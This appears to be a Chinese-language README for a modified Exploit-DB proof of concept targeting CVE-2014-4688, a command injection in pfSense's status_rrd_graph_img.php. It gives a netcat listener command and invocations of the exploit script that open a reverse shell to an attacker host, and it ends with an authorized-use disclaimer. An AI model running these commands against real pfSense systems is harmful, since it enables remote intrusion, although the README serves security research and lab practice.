针对 CVE-2014-4688(pfSense status_rrd_graph_img.php 命令注入)修改的 Exploit-DB 概念验证代码
本仓库包含针对 CVE-2014-4688 的原始 Exploit-DB 概念验证代码的修改版本,该漏洞影响 pfSense 版本 ≤ 2.1.3。
该漏洞存在于 status_rrd_graph_img.php 组件中,由于对 database 参数的输入净化不当,允许经过身份验证的用户执行任意系统命令。
status_rrd_graph_img.php经过身份验证的用户可以通过向易受攻击的端点提供精心构造的输入来注入任意 Shell 命令。
启动监听器:
nc -lvnp <LPORT>
概念验证:
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password
本仓库仅供授权的安全研究、教育和受控测试使用。 未经明确许可对系统进行未经授权的使用是违法且不道德的。